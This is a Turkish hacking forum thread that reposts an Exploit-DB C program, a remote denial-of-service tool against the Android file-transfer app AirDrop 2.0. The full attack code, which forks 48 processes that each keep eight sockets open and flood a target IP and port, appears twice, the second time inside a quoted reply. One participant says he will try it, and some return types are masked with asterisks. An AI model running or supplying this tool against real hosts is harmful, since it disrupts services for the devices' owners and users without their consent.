AirDrop 2.0 Remote Denial of Service (DoS)

BAGAY · 21 Şub 2019

// Exploit Title/Exploit Başlığı: AirDrop 2.0 Remote Denial of Service (DoS)
// Date/Tarih: 2019-02-21
// Exploit Author/Exploit Yazarı: Marcelo Vázquez (aka s4vitar)
// Vendor Homepage/Yapımcı Web Sitesi: https://support.apple.com/en-us/HT204144
// Software Link/Yazılım Linki: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer
// Version/Versiyon: <= AirDrop 2.0
// Tested on/Test Edilen Sistem: Android

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;

memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

**** broke(int s) {
// Nothing to do
}

#define CONNECTIONS 8
#define THREADS 48

**** attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
}
}
usleep(300000);
}
}

int main(int argc, char **argv) {

int x;

if (argc < 3) {
printf("Usage: ./AirDrop_DoS <ip-address> <port>\n");
exit(-1);
}

for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}

Exploit Linki : https://www.exploit-db.com/exploits/46445

Ghost Killer · 21 Şub 2019

Bu Dos Saldırı yapma programı mı hocam?

BAGAY · 21 Şub 2019

Ghost Killer' Alıntı:
Bu Dos Saldırı yapma programı mı hocam?

Belirtilen program ve versiyonu için geçerli Dos exploiti diyebiliriz.

Ghost Killer · 21 Şub 2019

BAGAY' Alıntı:
Belirtilen program ve versiyonu için geçerli Dos exploiti diyebiliriz.

Anladım hocam sağolun, deneyeceğim.

xMit · 21 Şub 2019

BAGAY' Alıntı:
// Exploit Title/Exploit Başlığı: AirDrop 2.0 Remote Denial of Service (DoS)
// Date/Tarih: 2019-02-21
// Exploit Author/Exploit Yazarı: Marcelo Vázquez (aka s4vitar)
// Vendor Homepage/Yapımcı Web Sitesi: https://support.apple.com/en-us/HT204144
// Software Link/Yazılım Linki: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer
// Version/Versiyon: <= AirDrop 2.0
// Tested on/Test Edilen Sistem: Android

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;

memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

**** broke(int s) {
// Nothing to do
}

#define CONNECTIONS 8
#define THREADS 48

**** attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
}
}
usleep(300000);
}
}

int main(int argc, char **argv) {

int x;

if (argc < 3) {
printf("Usage: ./AirDrop_DoS <ip-address> <port>\n");
exit(-1);
}

for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}

Exploit Linki : https://www.exploit-db.com/exploits/46445

Bi kaç konuna bakmıştım Anlayanlar kendilerine rahatlıkla pay çıkartabilir deneme fırsatları olabilir fakat genel kesime hitap etmek istiyorsan biraz daha genel hatlarını ortaya çıkartmalısın konuların

AirDrop 2.0 Remote Denial of Service (DoS)

BAGAY

Katılımcı Üye

Ghost Killer

Co Admin Yardımcısı

BAGAY

Katılımcı Üye

Ghost Killer

Co Admin Yardımcısı

xMit

Uzman üye

Sosyal medya sayfalarımız